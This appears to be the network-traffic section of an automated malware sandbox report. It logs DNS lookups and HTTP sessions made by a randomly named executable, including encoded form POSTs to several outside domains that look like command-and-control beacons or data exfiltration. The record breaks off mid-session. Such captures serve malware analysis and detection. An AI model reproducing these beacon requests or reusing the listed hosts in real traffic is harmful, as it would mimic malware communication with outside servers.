                                                                                  Nov 13, 2024 15:36:31.757040024 CET53639481.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:36:39.815146923 CET6134453192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:36:40.134289980 CET53613441.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:36:54.361058950 CET5429653192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:36:54.445348978 CET53542961.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:37:07.877304077 CET6224053192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:37:08.875526905 CET6224053192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:37:08.931442022 CET53622401.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:37:08.931499004 CET53622401.1.1.1192.168.2.5
                                                                                  Nov 13, 2024 15:37:22.897605896 CET5921153192.168.2.51.1.1.1
                                                                                  Nov 13, 2024 15:37:22.938776016 CET53592111.1.1.1192.168.2.5
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 13, 2024 15:34:05.995486975 CET192.168.2.51.1.1.10xac8cStandard query (0)www.bahaeng.comA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:34:22.126688004 CET192.168.2.51.1.1.10xcf87Standard query (0)www.atendefacil.infoA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:34:36.002886057 CET192.168.2.51.1.1.10x9802Standard query (0)www.sklad-iq.onlineA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:34:50.423686028 CET192.168.2.51.1.1.10x3af6Standard query (0)www.mdpc7.topA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:05.259255886 CET192.168.2.51.1.1.10xe0f3Standard query (0)www.ecojomos.xyzA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:19.758178949 CET192.168.2.51.1.1.10xd3c9Standard query (0)www.717hy.netA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:33.549442053 CET192.168.2.51.1.1.10x36f8Standard query (0)www.mrpokrovskii.proA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:47.456629038 CET192.168.2.51.1.1.10xbea7Standard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:48.467385054 CET192.168.2.51.1.1.10xbea7Standard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:49.472656965 CET192.168.2.51.1.1.10xbea7Standard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:04.175297022 CET192.168.2.51.1.1.10x2aa0Standard query (0)www.lsfanarolt.shopA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:17.752012014 CET192.168.2.51.1.1.10x36bbStandard query (0)www.129glenforest.comA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:31.721447945 CET192.168.2.51.1.1.10x66e3Standard query (0)www.joube.shopA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:39.815146923 CET192.168.2.51.1.1.10x17a2Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:54.361058950 CET192.168.2.51.1.1.10xbf77Standard query (0)www.grandesofertas.funA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:37:07.877304077 CET192.168.2.51.1.1.10x6808Standard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:37:08.875526905 CET192.168.2.51.1.1.10x6808Standard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:37:22.897605896 CET192.168.2.51.1.1.10xe119Standard query (0)www.rtpwslot888gol.sbsA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 13, 2024 15:34:06.080240965 CET1.1.1.1192.168.2.50xac8cNo error (0)www.bahaeng.com185.134.245.113A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:34:22.648819923 CET1.1.1.1192.168.2.50xcf87No error (0)www.atendefacil.info208.115.225.220A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:34:36.255896091 CET1.1.1.1192.168.2.50x9802No error (0)www.sklad-iq.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:34:51.361541986 CET1.1.1.1192.168.2.50x3af6No error (0)www.mdpc7.topmmd.dnsmmd.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 13, 2024 15:34:51.361541986 CET1.1.1.1192.168.2.50x3af6No error (0)mmd.dnsmmd.com20.2.36.112A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:34:51.361541986 CET1.1.1.1192.168.2.50x3af6No error (0)mmd.dnsmmd.com20.2.113.172A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:05.299642086 CET1.1.1.1192.168.2.50xe0f3No error (0)www.ecojomos.xyz203.161.46.205A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:20.225814104 CET1.1.1.1192.168.2.50xd3c9No error (0)www.717hy.net68.66.226.92A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:33.719866991 CET1.1.1.1192.168.2.50x36f8No error (0)www.mrpokrovskii.pro109.70.26.37A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:33.719866991 CET1.1.1.1192.168.2.50x36f8No error (0)www.mrpokrovskii.pro194.85.61.76A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:50.173671007 CET1.1.1.1192.168.2.50xbea7No error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:50.173726082 CET1.1.1.1192.168.2.50xbea7No error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:35:50.173754930 CET1.1.1.1192.168.2.50xbea7No error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:04.190411091 CET1.1.1.1192.168.2.50x2aa0No error (0)www.lsfanarolt.shop172.67.197.57A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:04.190411091 CET1.1.1.1192.168.2.50x2aa0No error (0)www.lsfanarolt.shop104.21.60.137A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:17.951235056 CET1.1.1.1192.168.2.50x36bbNo error (0)www.129glenforest.comdomains-38.cribflyer.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:17.951235056 CET1.1.1.1192.168.2.50x36bbNo error (0)domains-38.cribflyer.com50.18.131.220A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:17.951235056 CET1.1.1.1192.168.2.50x36bbNo error (0)domains-38.cribflyer.com52.9.60.8A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:31.757040024 CET1.1.1.1192.168.2.50x66e3Server failure (2)www.joube.shopnonenoneA (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:40.134289980 CET1.1.1.1192.168.2.50x17a2No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:54.445348978 CET1.1.1.1192.168.2.50xbf77No error (0)www.grandesofertas.funentri-domains.clickmax.ioCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:54.445348978 CET1.1.1.1192.168.2.50xbf77No error (0)entri-domains.clickmax.iossl.goentri.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:54.445348978 CET1.1.1.1192.168.2.50xbf77No error (0)ssl.goentri.com76.223.74.74A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:36:54.445348978 CET1.1.1.1192.168.2.50xbf77No error (0)ssl.goentri.com13.248.221.243A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:37:08.931442022 CET1.1.1.1192.168.2.50x6808No error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:37:08.931499004 CET1.1.1.1192.168.2.50x6808No error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:37:22.938776016 CET1.1.1.1192.168.2.50xe119No error (0)www.rtpwslot888gol.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Nov 13, 2024 15:37:22.938776016 CET1.1.1.1192.168.2.50xe119No error (0)www.rtpwslot888gol.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                  • www.bahaeng.com
                                                                                  • www.atendefacil.info
                                                                                  • www.sklad-iq.online
                                                                                  • www.mdpc7.top
                                                                                  • www.ecojomos.xyz
                                                                                  • www.717hy.net
                                                                                  • www.mrpokrovskii.pro
                                                                                  • www.7vh2wy.top
                                                                                  • www.lsfanarolt.shop
                                                                                  • www.129glenforest.com
                                                                                  • www.madhf.tech
                                                                                  • www.grandesofertas.fun
                                                                                  • www.sankan-fukushi.info
                                                                                  • www.rtpwslot888gol.sbs
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549950185.134.245.113803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:06.118314981 CET440OUTGET /7d81/?tXul=U2UloNhP&2J=rKnERuK87XwUpD46DfVgxrQvP3X7K9CGfDS22ViQ9f8p4xS2+clAvvHEJpZ8brBpsNS/kiukCkSqLcZJlXQs2/1YcKhhRt4ykNxCPrZ76z98Hxh/ipFlCU6POWu6VKl5iw== HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.bahaeng.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:34:06.956535101 CET1236INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:34:06 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Expires: Wed, 13 Nov 2024 15:34:06 GMT
                                                                                  Cache-Control: max-age=3600
                                                                                  Cache-Control: public
                                                                                  Data Raw: 31 34 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 6e 79 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 62 61 68 61 65 6e 67 2e 63 6f 6d 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 [TRUNCATED]
                                                                                  Data Ascii: 14fd<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.bahaeng.com is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo {
                                                                                  Nov 13, 2024 15:34:06.956558943 CET1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 35 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72
                                                                                  Data Ascii: width: auto; max-height: 50px; margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px;
                                                                                  Nov 13, 2024 15:34:06.956571102 CET424INData Raw: 2c 20 73 75 63 68 20 61 73 20 65 2d 6d 61 69 6c 2c 20 6d 61 79 20 62 65 20 61 63 74 69 76 65 6c 79 20 75 73 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 3c 62 72 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64
                                                                                  Data Ascii: , such as e-mail, may be actively used by the owner.<br><br><a href="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.bahaeng.com') + ' er registrert, men har ingen aktiv nettside enn. <br>
                                                                                  Nov 13, 2024 15:34:06.956865072 CET1236INData Raw: 68 61 65 6e 67 2e 63 6f 6d 27 29 20 2b 20 27 20 c3 a4 72 20 72 65 67 69 73 74 72 65 72 61 64 2c 20 6d 65 6e 20 68 61 72 20 69 6e 74 65 20 68 61 72 20 6e c3 a5 67 6f 6e 20 61 6b 74 69 76 20 77 65 62 73 69 64 61 20 c3 a4 6e 6e 75 2e 20 3c 62 72 3e
                                                                                  Data Ascii: haeng.com') + ' r registrerad, men har inte har ngon aktiv websida nnu. <br>Andra tjnster, t.ex. epost, kan anvnds aktivt av garen.<br><br><a href="https://www.domainnameshop.com/whois">Vem ger domnen?</a>', da: punycod
                                                                                  Nov 13, 2024 15:34:06.956877947 CET1236INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 6e 61 6d 65 73 68 6f 70 2e 63 6f 6d 2f 77 68 6f 69 73 22 0a 20 20 20 20 20 20 20 20 20 20 3e 57 68 6f 20 6f 77 6e 73 20 74 68 65 20 64 6f 6d 61 69 6e 3f 3c 2f 61 0a
                                                                                  Data Ascii: <a href="https://www.domainnameshop.com/whois" >Who owns the domain?</a > </p> <div class="logocont"> <a id="l" href="https://www.domainnameshop.com/" ><img id="i" class="logo" src="/images/logo-
                                                                                  Nov 13, 2024 15:34:06.956888914 CET276INData Raw: 6e 22 3b 0a 20 20 20 20 20 20 20 20 71 28 22 74 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 20 68 5b 73 5d 3b 0a 20 20 20 20 20 20 20 20 71 28 22 6d 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 6d
                                                                                  Data Ascii: n"; q("t").innerHTML = document.title = h[s]; q("m").innerHTML = m[s]; q("l").setAttribute("href", "https://" + u[s]); q("i").setAttribute("src", "/images/logo-" + s + "." + i); } setLang(l); </


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.549983208.115.225.220803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:22.670736074 CET712OUTPOST /ovl0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.atendefacil.info
                                                                                  Origin: http://www.atendefacil.info
                                                                                  Referer: http://www.atendefacil.info/ovl0/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 68 77 7a 72 75 72 2b 31 32 62 4a 72 43 38 66 32 37 4b 48 4c 76 79 43 64 77 49 2f 35 6d 52 2f 62 6b 62 58 67 73 74 59 72 58 30 71 39 77 59 30 4c 4a 46 5a 69 6c 50 6c 4b 33 6c 43 43 65 4b 6b 43 45 52 38 77 33 6b 4d 35 4c 33 59 4f 43 51 57 4f 35 45 5a 42 57 62 2f 6d 68 75 50 54 71 41 75 43 50 31 69 4b 42 49 6c 30 47 75 6b 7a 68 37 38 44 6c 5a 44 68 41 6d 32 41 38 38 4c 31 76 54 4d 79 74 74 38 41 78 64 62 50 35 71 51 4f 75 6c 41 78 53 2b 4f 45 79 72 4d 2b 4f 42 6d 76 59 63 55 70 4b 4c 7a 48 4d 5a 48 77 6e 78 6a 59 7a 5a 4a 44 53 46 4a 45 66 6d 69 69 78 66 6c 6e 39 68 59 2f 46 71 7a 41 68 58 4d 3d
                                                                                  Data Ascii: 2J=hwzrur+12bJrC8f27KHLvyCdwI/5mR/bkbXgstYrX0q9wY0LJFZilPlK3lCCeKkCER8w3kM5L3YOCQWO5EZBWb/mhuPTqAuCP1iKBIl0Gukzh78DlZDhAm2A88L1vTMytt8AxdbP5qQOulAxS+OEyrM+OBmvYcUpKLzHMZHwnxjYzZJDSFJEfmiixfln9hY/FqzAhXM=
                                                                                  Nov 13, 2024 15:34:23.994396925 CET481INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:23 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                  Nov 13, 2024 15:34:23.994760036 CET481INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:23 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                  Nov 13, 2024 15:34:23.999409914 CET481INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:23 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.549984208.115.225.220803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:25.223632097 CET732OUTPOST /ovl0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.atendefacil.info
                                                                                  Origin: http://www.atendefacil.info
                                                                                  Referer: http://www.atendefacil.info/ovl0/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 68 77 7a 72 75 72 2b 31 32 62 4a 72 42 64 76 32 2b 73 50 4c 74 53 43 63 75 59 2f 35 76 78 2b 63 6b 62 72 67 73 6f 6f 43 58 48 65 39 77 36 73 4c 49 48 68 69 69 50 6c 4b 76 56 43 48 52 71 6b 46 45 52 34 53 33 6c 77 35 4c 33 63 4f 43 52 6d 4f 36 33 78 47 58 4c 2f 34 34 65 50 52 6b 67 75 43 50 31 69 4b 42 49 78 65 47 75 38 7a 68 49 55 44 6d 34 44 69 4e 47 32 48 2f 38 4c 31 72 54 4e 37 74 74 38 2b 78 66 76 68 35 6f 6f 4f 75 6b 77 78 53 73 32 62 6c 62 4d 43 54 52 6e 77 53 38 46 64 47 34 4b 49 4f 71 33 30 77 77 47 68 37 50 34 70 49 6e 42 73 4d 47 4f 61 68 4d 74 51 73 52 35 57 66 4a 6a 77 2f 41 59 64 6a 57 38 38 45 2b 46 4d 32 78 59 75 49 36 69 7a 65 45 4b 68
                                                                                  Data Ascii: 2J=hwzrur+12bJrBdv2+sPLtSCcuY/5vx+ckbrgsooCXHe9w6sLIHhiiPlKvVCHRqkFER4S3lw5L3cOCRmO63xGXL/44ePRkguCP1iKBIxeGu8zhIUDm4DiNG2H/8L1rTN7tt8+xfvh5ooOukwxSs2blbMCTRnwS8FdG4KIOq30wwGh7P4pInBsMGOahMtQsR5WfJjw/AYdjW88E+FM2xYuI6izeEKh
                                                                                  Nov 13, 2024 15:34:25.924294949 CET481INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:25 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.549985208.115.225.220803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
